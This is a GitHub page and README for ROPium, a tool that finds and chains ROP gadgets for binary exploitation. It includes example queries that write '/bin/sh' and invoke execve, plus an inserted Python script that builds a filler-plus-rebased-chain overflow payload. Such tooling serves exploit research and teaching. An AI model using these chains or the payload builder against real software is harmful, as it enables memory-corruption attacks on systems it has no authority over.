https://github.com/boyan-milanov/ropium
ROPium is a tool that helps you building ROP exploits by finding and chaining gadgets together
- Host: GitHub
- URL: https://github.com/boyan-milanov/ropium
- Owner: Boyan-MILANOV
- Created: 2018-02-10T17:55:25.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2023-01-15T16:25:04.000Z (over 2 years ago)
- Last Synced: 2025-03-29T21:09:17.918Z (3 months ago)
- Topics: binary-exploitation, chaining-gadgets, exploit-development, gadget, rop-chain, rop-exploits, rop-gadgets, security, security-vulnerability, semantic
- Language: C++
- Homepage:
- Size: 11.5 MB
- Stars: 384
- Watchers: 12
- Forks: 42
- Open Issues: 7
Metadata Files:
- Readme: README.md
README
# About
**ROPium** (ex-ROPGenerator) is a library/tool that makes ROP exploits easy. It automatically extracts and analyses gadgets from binaries and
lets you find ROP chains with semantic queries. ROPium supports *X86* and *X64* architectures, soon to be
extended with *ARM*.

Key features:
- **Effortless**: ROPium works out-of-the-box with a smooth Command Line Interface
- **Python API**: It is easy to integrate ROPium in scripts thanks to its Python API
- **Automatic chaining**: ROPium automatically combines gadgets to create complex ROP chains
- **Advanced features**: ROPium supports function calls for various ABIs, syscalls, ...
- **Semantic queries**: ROPium queries are quick and convenient to write: ``rax=rbx+8``, ``[rdi+0x20]=rax``, ``rsi=[rbx+16]``, ``0x08040212(1, 2, rax)``, ``[0xdeadbeaf] = "/bin/sh\x00"``, ``sys_execve(0xdeadbeef, 0, 0)``, ``sys_0x1(0)``, ``...``

# Content
- [About](#about)
- [Installation](#installation)
- [Getting started](#getting-started)
- [CLI tool](#cli-tool)
- [Python API](#python-api)
- [Docker](#docker)
- [Contact](#contact)
- [Licence](#licence)
- [Special thanks](#special-thanks)

# Installation
First install the [Capstone](https://github.com/aquynh/capstone) disassembly framework:
```bash
sudo apt-get install libcapstone-dev
```
You also need the latest [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) release:
```bash
git clone https://github.com/JonathanSalwan/ROPgadget && cd ROPgadget
python setup.py install --user
```
To use the CLI tool, install [prompt_toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit):
```bash
pip3 install prompt_toolkit
```
Finally install **ROPium**:
```bash
git clone https://github.com/Boyan-MILANOV/ropium && cd ropium
make
make test
sudo make install
```

# Getting started
### CLI tool
Thanks to a Command-Line-Interface wrapper, you can use ROPium interactively to quickly build ropchains.
### Python API
Do you need to integrate ropchains directly in your scripts? Good news, ROPium has a Python API!
Loading a binary and finding ropchains:
```Python
from ropium import *

rop = ROPium(ARCH.X64)
rop.load('/lib/x86_64-linux-gnu/libc-2.27.so')
chain = rop.compile('rbx = [rax + 0x20]')
```
Dumping a ropchain in various formats (the `python` dump below is reconstructed from the `dump()` and `dump('raw')` output: the raw bytes are three little-endian 8-byte words, hence `pack('<Q', ...)`):
```Python
>>> print( chain.dump() )
0x000000000009a851 (sub rax, 0x10; ret)
0x0000000000130018 (mov rax, qword ptr [rax + 0x30]; ret)
0x0000000000052240 (push rax; pop rbx; ret)
>>> print(chain.dump('python'))
from struct import pack
off = 0x0
p = ''
p += pack('<Q', 0x000000000009a851+off) # sub rax, 0x10; ret
p += pack('<Q', 0x0000000000130018+off) # mov rax, qword ptr [rax + 0x30]; ret
p += pack('<Q', 0x0000000000052240+off) # push rax; pop rbx; ret
>>> print(chain.dump('raw'))
b'Q\xa8\t\x00\x00\x00\x00\x00\x18\x00\x13\x00\x00\x00\x00\x00@"\x05\x00\x00\x00\x00\x00'
```
Set constraints on ropchains:
```Python
# Bytes that should not appear in the ropchain
rop.bad_bytes = [0x00, 0x0a, 0x0b]

# Registers that should not be clobbered by the ropchain
rop.keep_regs = ['rsi', 'rdx']

# Allow/forbid the ropchain to dereference registers that might hold invalid addresses
# Safe mode is 'True' by default
rop.safe_mem = False

# Specify which ABI you want to use when calling functions
rop.abi = ABI.X86_CDECL

# Specify which system to target when doing syscalls
rop.os = OS.LINUX
```
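The three dump formats above are views of the same data. What the README does not show is the step after `dump('raw')`: adding the library's runtime load address (the `off` variable of the `python` dump) and re-checking the delivery constraints on the bytes that actually reach the target. The following added example, which is not part of ROPium or its README, does that with the standard library only, so it runs without ROPium installed. The raw chain is copied from the `dump('raw')` output above (constructed constant); `LIBC_BASE` and the return-address offset of 40 are hypothetical values chosen for illustration.

```python
"""Post-process a ROPium raw chain into a deliverable payload.

Added example, not ROPium code: it uses only the standard library and the
chain bytes printed by chain.dump('raw') in the README above.
"""
import struct

# The three gadget addresses ROPium found for 'rbx = [rax + 0x20]' in libc,
# exactly as printed by chain.dump('raw') above: three little-endian 8-byte
# words because the chain was compiled for ARCH.X64 (constructed input).
RAW_CHAIN = (
    b'Q\xa8\t\x00\x00\x00\x00\x00'        # 0x9a851  sub rax, 0x10; ret
    b'\x18\x00\x13\x00\x00\x00\x00\x00'   # 0x130018 mov rax, qword ptr [rax + 0x30]; ret
    b'@"\x05\x00\x00\x00\x00\x00'         # 0x52240  push rax; pop rbx; ret
)

# Hypothetical libc load address for this example (in a real exploit it comes
# from a leaked pointer at runtime); page aligned like a real mapping.
LIBC_BASE = 0x7ffff7dc0000

WORD_X64 = struct.Struct('<Q')   # pointer width for ARCH.X64
WORD_X86 = struct.Struct('<I')   # pointer width for ARCH.X86


def chain_to_addresses(raw, word=WORD_X64):
    """Split a raw chain into its gadget addresses (the inverse of dump('raw'))."""
    if len(raw) % word.size:
        raise ValueError(f'chain length {len(raw)} is not a multiple of {word.size}')
    return [word.unpack_from(raw, off)[0] for off in range(0, len(raw), word.size)]


def addresses_to_chain(addresses, word=WORD_X64):
    """Pack gadget addresses back into the byte layout the stack expects."""
    return b''.join(word.pack(a) for a in addresses)


def rebase(raw, base, word=WORD_X64):
    """Add the library load address to every gadget (what 'off' does in the python dump)."""
    return addresses_to_chain([a + base for a in chain_to_addresses(raw, word)], word)


def find_bad_bytes(payload, bad_bytes):
    """Offsets in payload holding a byte the delivery channel cannot carry."""
    bad = set(bad_bytes)
    return [i for i, b in enumerate(payload) if b in bad]


def build_payload(raw_chain, base, ret_offset, bad_bytes=(), filler=b'A', word=WORD_X64):
    """Filler up to the saved return address, then the rebased chain.

    Whatever ROPium filtered through rop.bad_bytes, the bytes that reach the
    target are the *rebased* ones, so the check is repeated on the final
    payload. A hit here means re-compiling the chain with other gadgets or
    changing the delivery channel.
    """
    payload = filler * ret_offset + rebase(raw_chain, base, word)
    hits = find_bad_bytes(payload, bad_bytes)
    if hits:
        raise ValueError('bad byte(s) at payload offset(s) ' + ', '.join(map(str, hits)))
    return payload


if __name__ == '__main__':
    # ret_offset 40 is a hypothetical distance from buffer start to the saved RIP.
    for addr in chain_to_addresses(RAW_CHAIN):
        print(f'{addr:#018x} -> {addr + LIBC_BASE:#018x}')
    payload = build_payload(RAW_CHAIN, LIBC_BASE, 40, bad_bytes=(0x0a, 0x0b))
    print(len(payload), 'bytes; zero bytes at offsets', find_bad_bytes(payload, (0x00,)))
```

Two caveats that follow from the output above. The `python` dump starts with `p = ''`; under Python 3 `pack()` returns `bytes`, so initialise `p = b''` before appending or the first `+=` raises `TypeError`. And on X64 every user-space address carries zero high bytes, so a chain of raw pointers cannot satisfy `0x00` in `bad_bytes` once rebased; the final check above is what tells you which channel constraints are actually met.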
# Docker
If needed you can run ROPium in a docker container. The container can be generated from the *Dockerfile* as
follows:
```bash
# Create your docker image (this will take time!)
docker build . --tag ropium

# Run the image in interactive mode, bind mounting the file to analyze
docker run --rm -it -v /FULL/HOST/PATH/FILE:/tmp/FILE:ro ropium
(ropium)> load -a X86 /tmp/FILE
```
The actual image is around 200 MB, based on Debian Stretch with Python 3.7.3 installed.

# Contact
**Boyan MILANOV** - boyan.milanov (at) hotmail (dot) fr
# Licence
ROPium is provided under the MIT licence.

# Special thanks
Contributors:
- Docker container support: [migounette](https://github.com/migounette), [clslgrnc](https://github.com/clslgrnc)

ROPium uses the following awesome projects:
- [capstone](https://github.com/aquynh/capstone) : Disassembly Framework
- [ROPgadget](https://github.com/JonathanSalwan/ROPgadget) : Gadget extractor
- [prompt-toolkit](https://github.com/prompt-toolkit/python-prompt-toolkit) : Python CLI interface library